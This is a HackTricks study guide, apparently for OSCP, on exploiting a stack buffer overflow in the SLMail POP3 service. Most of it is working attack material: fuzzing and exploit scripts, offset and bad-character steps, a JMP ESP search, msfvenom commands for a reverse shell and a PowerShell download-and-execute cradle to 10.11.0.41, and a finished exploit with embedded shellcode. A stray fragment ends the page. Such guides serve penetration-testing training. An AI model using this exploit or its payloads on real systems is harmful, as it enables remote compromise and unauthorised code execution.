hacktricks/exploiting/windows-exploiting-basic-guide-oscp-lvl.md
2024-02-10 17:52:19 +00:00


Windows Exploiting (Basic Guide - OSCP lvl)

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Start installing the SLMail service

Restart SLMail service

Every time you need to restart the SLMail service, you can do it from the Windows console:

net start slmail

Python exploit template

#!/usr/bin/env python

import socket

# Create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Define the target IP and port
target_ip = "TARGET_IP_ADDRESS"
target_port = TARGET_PORT_NUMBER

# Connect to the target
s.connect((target_ip, target_port))

# Craft the payload
payload = "PAYLOAD"

# Send the payload to the target
s.send(payload)

# Receive the response from the target
response = s.recv(1024)

# Print the response
print(response)

# Close the connection
s.close()

Replace TARGET_IP_ADDRESS with the IP address of the target machine and TARGET_PORT_NUMBER with the port number you want to exploit. Replace PAYLOAD with the payload you want to send to the target machine.

Save the script with a .py extension and execute it to exploit the target machine.

#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '10.11.25.153'
port = 110

buffer = 'A' * 2700
try:
    print "\nLaunching exploit..."
    s.connect((ip, port))
    data = s.recv(1024)
    s.send('USER username' + '\r\n')
    data = s.recv(1024)
    s.send('PASS ' + buffer + '\r\n')
    print "\nFinished!."
except socket.error:
    # port is an int, so convert it before concatenating
    print "Could not connect to " + ip + ":" + str(port)

Change Immunity Debugger font

Options >> Appearance >> Fonts >> Change(Consolas, Bold, 9) >> OK

Attach the process to Immunity Debugger

File --> Attach

And press the START button

Send the exploit and check EIP

Every time you crash the service, restart it as described at the beginning of this page.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

Change the exploit buffer to the pattern and launch the exploit.

This produces a crash, but with a different EIP value:

Check whether that value is in your pattern and at which offset:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438

It looks like EIP can be controlled at offset 2606 of the buffer.
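How a faulting EIP value maps back to an input offset, as an added example that is not part of the original page: it rebuilds the upper/lower/digit cyclic pattern and looks up the register value from the command above. The function names are chosen here and only mirror the tool names for readability.

```python
import string
import struct


def pattern_create(length):
    """Build the cyclic pattern Aa0Aa1Aa2... from (upper, lower, digit) triples."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    # 26 * 26 * 10 triples = 20280 characters before the pattern would repeat
    return "".join(triples)[:length]


def pattern_offset(register_hex, length):
    """Offset of the 4 bytes seen in the register inside the pattern, or -1."""
    # x86 is little-endian: a register value of 0x39694438 was loaded from the
    # input bytes 38 44 69 39, i.e. the text "8Di9".
    needle = struct.pack("<I", int(register_hex, 16)).decode("latin-1")
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_offset("39694438", 3000))
```

A result of -1 means the register value did not come from the pattern, for example because the service altered or truncated the input before the crash.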

Verify it by changing the exploit buffer:

buffer = 'A'*2606 + 'BBBB' + 'CCCC'

With this buffer, the crashed EIP should point to 42424242 ("BBBB").

Check for shellcode space

600B should be enough for any powerful shellcode.

Change the buffer:

buffer = 'A'*2606 + 'BBBB' + 'C'*600

Launch the new exploit and check the EBP and the length of the useful shellcode.

In this case we have from 0x0209A128 to 0x0209A2D6 = 430B.

Check for bad chars

Change again the buffer:

badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
buffer = 'A'*2606 + 'BBBB' + badchars

The badchars string starts at 0x01.

Run the exploit with this new buffer.

!mona modules    #Get protections, look for all false except last one (OS Dll)

List the memory maps and search for a DLL that has:

  • Rebase: False
  • SafeSEH: False
  • ASLR: False
  • NXCompat: False
  • OS Dll: True
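The same properties can be audited from the defender's side on binaries you ship. This added example (not from the original page) reads the ASLR and NXCompat opt-in bits from a PE file's DllCharacteristics field; SafeSEH lives in the load-config directory and Rebase is a runtime property, so neither is covered, and the sample headers are constructed for the demo.

```python
import struct

DYNAMIC_BASE = 0x0040  # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -> "ASLR"
NX_COMPAT = 0x0100     # IMAGE_DLLCHARACTERISTICS_NX_COMPAT    -> "NXCompat"


def pe_mitigations(image):
    """Return {'ASLR': bool, 'NXCompat': bool} from the bytes of a PE file."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    opt = e_lfanew + 4 + 20  # PE signature (4 bytes) + COFF header (20 bytes)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(image) < opt + 72:
        raise ValueError("not a PE file: bad or truncated NT headers")
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    # DllCharacteristics sits at offset 70 of the optional header in both formats
    (flags,) = struct.unpack_from("<H", image, opt + 70)
    return {"ASLR": bool(flags & DYNAMIC_BASE),
            "NXCompat": bool(flags & NX_COMPAT)}


def build_sample(dll_characteristics):
    """Constructed minimal header set (not a loadable DLL), for the demo only."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0, 0x2102)
    optional = bytearray(0xE0)
    struct.pack_into("<H", optional, 0, 0x10B)             # PE32 magic
    struct.pack_into("<H", optional, 70, dll_characteristics)
    return dos + b"PE\0\0" + coff + bytes(optional)


def weak_modules(modules):
    """Sorted names of modules that lack ASLR or NXCompat."""
    return sorted(name for name, image in modules.items()
                  if not all(pe_mitigations(image).values()))


# Constructed samples: one module with no opt-ins, one with both bits set.
SAMPLES = {
    "legacy.dll": build_sample(0x0000),
    "hardened.dll": build_sample(DYNAMIC_BASE | NX_COMPAT),
}

if __name__ == "__main__":
    for name, image in SAMPLES.items():
        print(name, pe_mitigations(image))
    print("rebuild with /DYNAMICBASE /NXCOMPAT:", weak_modules(SAMPLES))
```

For a real file, pass `open(path, "rb").read()` to `pe_mitigations`.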

Now, inside this memory you should find some JMP ESP bytes. To do that, execute:

!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes inside dll space (JMP ESP)
!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case

Then, if an address is found, choose one:

In this case, for example: _0x5f4a358f_

Create shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d'

If the exploit is not working but it should (you can see in Immunity Debugger that the shellcode is reached), try creating other shellcodes with msfvenom for the same parameters.

Add some NOPs at the beginning of the shellcode, use the JMP ESP address as the return address, and finish the exploit:

#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '10.11.25.153'
port = 110

shellcode = (
"\xb8\x30\x3f\x27\x0c\xdb\xda\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x52\x31\x45\x12\x83\xed\xfc\x03\x75\x31\xc5\xf9\x89\xa5\x8b"
"\x02\x71\x36\xec\x8b\x94\x07\x2c\xef\xdd\x38\x9c\x7b\xb3\xb4"
"\x57\x29\x27\x4e\x15\xe6\x48\xe7\x90\xd0\x67\xf8\x89\x21\xe6"
"\x7a\xd0\x75\xc8\x43\x1b\x88\x09\x83\x46\x61\x5b\x5c\x0c\xd4"
"\x4b\xe9\x58\xe5\xe0\xa1\x4d\x6d\x15\x71\x6f\x5c\x88\x09\x36"
"\x7e\x2b\xdd\x42\x37\x33\x02\x6e\x81\xc8\xf0\x04\x10\x18\xc9"
"\xe5\xbf\x65\xe5\x17\xc1\xa2\xc2\xc7\xb4\xda\x30\x75\xcf\x19"
"\x4a\xa1\x5a\xb9\xec\x22\xfc\x65\x0c\xe6\x9b\xee\x02\x43\xef"
"\xa8\x06\x52\x3c\xc3\x33\xdf\xc3\x03\xb2\x9b\xe7\x87\x9e\x78"
"\x89\x9e\x7a\x2e\xb6\xc0\x24\x8f\x12\x8b\xc9\xc4\x2e\xd6\x85"
"\x29\x03\xe8\x55\x26\x14\x9b\x67\xe9\x8e\x33\xc4\x62\x09\xc4"
"\x2b\x59\xed\x5a\xd2\x62\x0e\x73\x11\x36\x5e\xeb\xb0\x37\x35"
"\xeb\x3d\xe2\x9a\xbb\x91\x5d\x5b\x6b\x52\x0e\x33\x61\x5d\x71"
"\x23\x8a\xb7\x1a\xce\x71\x50\x2f\x04\x79\x89\x47\x18\x79\xd8"
"\xcb\x95\x9f\xb0\xe3\xf3\x08\x2d\x9d\x59\xc2\xcc\x62\x74\xaf"
"\xcf\xe9\x7b\x50\x81\x19\xf1\x42\x76\xea\x4c\x38\xd1\xf5\x7a"
"\x54\xbd\x64\xe1\xa4\xc8\x94\xbe\xf3\x9d\x6b\xb7\x91\x33\xd5"
"\x61\x87\xc9\x83\x4a\x03\x16\x70\x54\x8a\xdb\xcc\x72\x9c\x25"
"\xcc\x3e\xc8\xf9\x9b\xe8\xa6\xbf\x75\x5b\x10\x16\x29\x35\xf4"
"\xef\x01\x86\x82\xef\x4f\x70\x6a\x41\x26\xc5\x95\x6e\xae\xc1"
"\xee\x92\x4e\x2d\x25\x17\x7e\x64\x67\x3e\x17\x21\xf2\x02\x7a"
"\xd2\x29\x40\x83\x51\xdb\x39\x70\x49\xae\x3c\x3c\xcd\x43\x4d"
"\x2d\xb8\x63\xe2\x4e\xe9"
)

buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode
try:
    print "\nLaunching exploit..."
    s.connect((ip, port))
    data = s.recv(1024)
    s.send('USER username' + '\r\n')
    data = s.recv(1024)
    s.send('PASS ' + buffer + '\r\n')
    print "\nFinished!."
except socket.error:
    # port is an int, so convert it before concatenating
    print "Could not connect to " + ip + ":" + str(port)


EXITFUNC=thread -e x86/shikata_ga_nai